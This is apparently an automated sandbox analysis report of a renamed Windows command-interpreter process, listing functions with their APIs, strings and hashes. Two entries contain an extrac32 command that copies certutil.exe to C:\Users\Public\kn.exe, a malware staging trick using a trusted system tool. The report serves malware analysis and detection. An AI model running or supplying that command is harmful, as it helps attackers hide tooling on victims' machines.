                                      • Instruction Fuzzy Hash: D9616E77704BC68AEBA19F21D8443E9B7A4FB85B88F884135CA0D8B758DF78D245C710
                                      Function 00007FF755CA72B0 Relevance: 21.3, APIs: 1, Strings: 11, Instructions: 283COMMON
                                      Download Yara Rule
                                      APIs
                                      • longjmp.MSVCRT(?,00000000,00000000,00007FF755CA7279,?,?,?,?,?,00007FF755CABFA9), ref: 00007FF755CC4485
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: longjmp
                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                      • API String ID: 1832741078-366822981
                                      • Opcode ID: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                      • Instruction ID: da8f60e380d817feaad94abab3b5c6df8d613936da68d362f1436af081f7be86
                                      • Opcode Fuzzy Hash: 33da1405c176275929384e71d7b709e1d480dac8859b2aca32cf24daa89c1558
                                      • Instruction Fuzzy Hash: 3AC1B2EAF0C68381E664FB0591805B8A7A1BB46F8EFDDA072CD1D97691CF6CE445C320
                                      Function 00007FF755CAB998 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 275COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CACD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDA6
                                        • Part of subcall function 00007FF755CACD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF755CAB9A1,?,?,?,?,00007FF755CAD81A), ref: 00007FF755CACDBD
                                      • memset.MSVCRT ref: 00007FF755CABA2B
                                      • wcschr.MSVCRT ref: 00007FF755CABA8A
                                      • wcschr.MSVCRT ref: 00007FF755CABAAA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heapwcschr$AllocProcessmemset
                                      • String ID: -$:.\$=,;$=,;+/[] "
                                      • API String ID: 2872855111-969133440
                                      • Opcode ID: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                      • Instruction ID: 0281ed1dcdce4a89e8a7201be2150ab61701b2e2bda01166c7b3bcc1b8e22d4f
                                      • Opcode Fuzzy Hash: 7b3217b0480b3f12f234bd17b6b4b81bb5ac0aea220cc5327607834eba670ac4
                                      • Instruction Fuzzy Hash: 3AB194BBA0D68381FA60AB15E044279ABA0FF44F9CFD95635CA5E47794DF7CE8418320
                                      Function 00007FF755CAFC30 Relevance: 19.6, APIs: 9, Strings: 2, Instructions: 311memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: longjmp$Heap$AllocByteCharMultiProcessWidememmovememset
                                      • String ID: 0123456789$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                      • API String ID: 1606811317-2340392073
                                      • Opcode ID: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                      • Instruction ID: f4313fc6511e115357e6c180e4115cc7f628ecb7f8905f17207c1d52cb848670
                                      • Opcode Fuzzy Hash: 8103515748828c6243a0f650469ddac0473b2fcaea6880b388f8c0650ade34ac
                                      • Instruction Fuzzy Hash: 3DD191AFE08A8381E651AB15E8042B9ABA0FF45F98FDC4135DA5D177A5DF3CE805C720
                                      Function 00007FF755CD03AC Relevance: 19.5, APIs: 9, Strings: 2, Instructions: 219COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$ErrorLast$InformationVolume
                                      • String ID: %04X-%04X$~
                                      • API String ID: 2748242238-2468825380
                                      • Opcode ID: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                      • Instruction ID: 3e7f069f0ef052ec48d9cd97886c616e2190eab2c34642465db2102d99cfc2f8
                                      • Opcode Fuzzy Hash: 6140927c712726b5ce6b5c6052370d277af7610c6653376c5bf883b173b19ee6
                                      • Instruction Fuzzy Hash: E1A1A5B7708BC286EB659F2198402E9B7A1FB84B88FC84135D94D5BB48EF3CD645C710
                                      Function 00007FF755CB662C Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 170COMMON
                                      Download Yara Rule
                                      APIs
                                      • wcschr.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB6677
                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB668F
                                      • _errno.MSVCRT ref: 00007FF755CB66A3
                                      • wcstol.MSVCRT ref: 00007FF755CB66C4
                                      • iswdigit.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB66E4
                                      • iswalpha.MSVCRT(?,?,?,?,?,?,?,00007FF755CB6570,?,?,?,?,?,?,00000000,00007FF755CB6488), ref: 00007FF755CB66FE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: iswdigit$_errnoiswalphawcschrwcstol
                                      • String ID: +-~!$APerformUnaryOperation: '%c'
                                      • API String ID: 2348642995-441775793
                                      • Opcode ID: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                      • Instruction ID: ed0af47234d59f2dfbb3ea1ef21544d7b0fa30bcb17536f4110cc0718e4b0a73
                                      • Opcode Fuzzy Hash: 3043d5b8b3736d8e68c05dd1a897401147fff5d71c47df5c8b899d9aaf2ce369
                                      • Instruction Fuzzy Hash: 16715FABD08A8785E7606F21D450179F7A0FB45FA8BDCD135DA8E56394EF3CA884C720
                                      Function 00007FF755CA9400 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 161COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: memset$ErrorInformationLastVolume_wcsicmptowupper
                                      • String ID: FAT$~
                                      • API String ID: 2238823677-1832570214
                                      • Opcode ID: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                      • Instruction ID: 38116dba36b65c5341adbe5be3fcc57d4b9775f5ad283fd6aacacb2c7907d5ac
                                      • Opcode Fuzzy Hash: 31d5b5f442e73b16389405a1f8f1aa1cf1f987a59b4b054618f08dfe6adbd7a2
                                      • Instruction Fuzzy Hash: AA717477608BC28AEB61DF21D8502E9B7A0FB85B49F884435DA4D4B754DF3CD645C710
                                      Function 00007FF755CAD840 Relevance: 18.4, APIs: 12, Instructions: 444memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF755CAFE2A), ref: 00007FF755CAD884
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF755CAFE2A), ref: 00007FF755CAD89D
                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF755CAFE2A), ref: 00007FF755CAD94D
                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF755CAFE2A), ref: 00007FF755CAD964
                                      • _wcsnicmp.MSVCRT ref: 00007FF755CADB89
                                      • wcstol.MSVCRT ref: 00007FF755CADBDF
                                      • wcstol.MSVCRT ref: 00007FF755CADC63
                                      • memmove.MSVCRT ref: 00007FF755CADD33
                                      • memmove.MSVCRT ref: 00007FF755CADE9A
                                      • longjmp.MSVCRT(?,?,?,?,?,?,?,?,?,00000010,?,00000000,0000000E,00000025,?,00007FF755CAFE2A), ref: 00007FF755CADF1F
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$AllocProcessmemmovewcstol$_wcsnicmplongjmp
                                      • String ID:
                                      • API String ID: 1051989028-0
                                      • Opcode ID: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                      • Instruction ID: 63fe2ac5295f5ba1c428929941c264703ae4b839406ec43e412e0e08a5294a85
                                      • Opcode Fuzzy Hash: 64565f03666b4bb772596797247e6bb6fdde89d50adaa5f7e3853eb5f84ddd48
                                      • Instruction Fuzzy Hash: 4A0273BBA0878781EB24AF15E40027ABBA1FB45F98F984635DA8E07794DF7CD4418720
                                      Function 00007FF755CA86B0 Relevance: 18.1, APIs: 8, Strings: 4, Instructions: 138memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: Heap$_wcsicmp$AllocProcess
                                      • String ID: DISABLEDELAYEDEXPANSION$DISABLEEXTENSIONS$ENABLEDELAYEDEXPANSION$ENABLEEXTENSIONS
                                      • API String ID: 3223794493-3086019870
                                      • Opcode ID: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                      • Instruction ID: a23ddf87c2a92a25503956f8c4780e9105f9a88ccf1d372a7933706ae566c492
                                      • Opcode Fuzzy Hash: d222a0f06bbbc582554831b5995f9d518337be47592992ae4180831db5f06540
                                      • Instruction Fuzzy Hash: EB5181ABA08B4386EA55AB15E810179BBA0FF49F58FDC9534C95E473A0DF7CE441C720
                                      Function 00007FF755CB2B94 Relevance: 18.1, APIs: 6, Strings: 6, Instructions: 110COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: EQU$GEQ$GTR$LEQ$LSS$NEQ
                                      • API String ID: 0-3124875276
                                      • Opcode ID: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                      • Instruction ID: 4014cd719c9b754c5a65d1e84afba2d2a552b3811682f965dbfa9452e7cc782b
                                      • Opcode Fuzzy Hash: 27546f26981fd3a6242742626cf9575fc19742bdde1af1eb23768a0abe577f48
                                      • Instruction Fuzzy Hash: 9E519EABA0C64381FB54BF60A4502B9E7A4AF45F5DFC89035C64E862A4DF7CA805C370
                                      Function 00007FF755CCBFEC Relevance: 17.9, APIs: 3, Strings: 7, Instructions: 444COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB58E4: EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,?,00007FF755CCC6DB), ref: 00007FF755CB58EF
                                        • Part of subcall function 00007FF755CB081C: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF755CB084E
                                      • towupper.MSVCRT ref: 00007FF755CCC1C9
                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CCC31C
                                      • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF755CCC5CB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: CriticalDriveEnterEnvironmentFreeLocalSectionTypeVariabletowupper
                                      • String ID: %s $%s>$PROMPT$Unknown$\$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe $x
                                      • API String ID: 2242554020-619615743
                                      • Opcode ID: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                      • Instruction ID: f66c61354dadd765d45d07347a58caae6fee67f9e2fe540d74efb676840994bc
                                      • Opcode Fuzzy Hash: 4a922d4c85f00677817b5c761d16b1de45b4041caf2284929607811bb1d70d1e
                                      • Instruction Fuzzy Hash: 0B1281ABA0864381EA60BB15A45417AE7A0EF44FA8FD86235D97E437E0DF3CE541D720
                                      Function 00007FF755CB6FB4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 148COMMON
                                      Download Yara Rule
                                      APIs
                                      • memset.MSVCRT ref: 00007FF755CB7013
                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF755CB7123
                                        • Part of subcall function 00007FF755CB1EA0: wcschr.MSVCRT(?,?,?,00007FF755CA286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF755CD0D54), ref: 00007FF755CB1EB3
                                      • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB706E
                                      • wcsncmp.MSVCRT ref: 00007FF755CB70A5
                                      • wcsstr.MSVCRT ref: 00007FF755CBF9DB
                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CBFA00
                                      • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CBFA5F
                                        • Part of subcall function 00007FF755CB823C: FindFirstFileExW.KERNELBASE ref: 00007FF755CB8280
                                        • Part of subcall function 00007FF755CB823C: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF755CB829D
                                        • Part of subcall function 00007FF755CB3A0C: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF755CCEAC5,?,?,?,00007FF755CCE925,?,?,?,?,00007FF755CAB9B1), ref: 00007FF755CB3A56
                                      • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CBFA3D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                      • String ID: \\.\
                                      • API String ID: 799470305-2900601889
                                      • Opcode ID: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                      • Instruction ID: 1615e8232e7405270827d3ee132d924cd4a876c5bb326428a175fe0ed80f1114
                                      • Opcode Fuzzy Hash: 7ea5b237473074eb8a3c93ab886d3958f76363502f2a90bc42476f967ba8e34b
                                      • Instruction Fuzzy Hash: FF5195BBA08A8385EB60AF1198002B9B7A4FB85F68FCD4535DE4E47794DF3CD9458320
                                      Function 00007FF755CA8B20 Relevance: 16.8, APIs: 11, Instructions: 254COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_7ff755ca0000_alpha.jbxd
                                      Similarity
                                      • API ID: _wcsicmpwcschr$AttributesErrorFileLastwcsrchr
                                      • String ID:
                                      • API String ID: 1944892715-0
                                      • Opcode ID: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                      • Instruction ID: 5d532a687fc6627fc069f5530099d134c135ccace16020547bad048ababe5d8b
                                      • Opcode Fuzzy Hash: b04fd89d1b32d74b41568e07ffd85bc9ccdf1354646f06c8d836b15a263e4c9a
                                      • Instruction Fuzzy Hash: 55B15EBBA0964386EA64BB11E854179EAA0FF45F9CFCC8535CA4E47391DE7CE840C720
                                      Function 00007FF755CA5458 Relevance: 16.7, APIs: 11, Instructions: 213fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00007FF755CB3578: _get_osfhandle.MSVCRT ref: 00007FF755CB3584
                                        • Part of subcall function 00007FF755CB3578: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB359C
                                        • Part of subcall function 00007FF755CB3578: GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35C3
                                        • Part of subcall function 00007FF755CB3578: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35D9
                                        • Part of subcall function 00007FF755CB3578: GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB35ED
                                        • Part of subcall function 00007FF755CB3578: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000014,00007FF755CA32E8,?,?,?,?,?,?,?,?,?,?,00000000,00000014), ref: 00007FF755CB3602
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CA54DE
                                      • WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0(?,?,00007FF755CA1F7D), ref: 00007FF755CA552B
                                      • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00007FF755CA1F7D), ref: 00007FF755CA554F
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CC345F
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF755CA1F7D), ref: 00007FF755CC347E
                                      • SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF755CA1F7D), ref: 00007FF755CC34C3
                                      • _get_osfhandle.MSVCRT ref: 00007FF755CC34DB
                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00007FF755CA1F7D), ref: 00007FF755CC34FA
                                        • Part of subcall function 00007FF755CB36EC: _get_osfhandle.MSVCRT ref: 00007FF755CB3715
                                        • Part of subcall function 00007FF755CB36EC: WideCharToMultiByte.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF755CB3770
                                        • Part of subcall function 00007FF755CB36EC: WriteFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF755CB3791
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.1665096334.00007FF755CA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF755CA0000, based on PE: true
                                      • Associated: 00000003.00000002.1665081924.00007FF755CA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665124331.00007FF755CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CDD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CE1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665140972.00007FF755CEF000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000003.00000002.1665189501.00007FF755CF9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
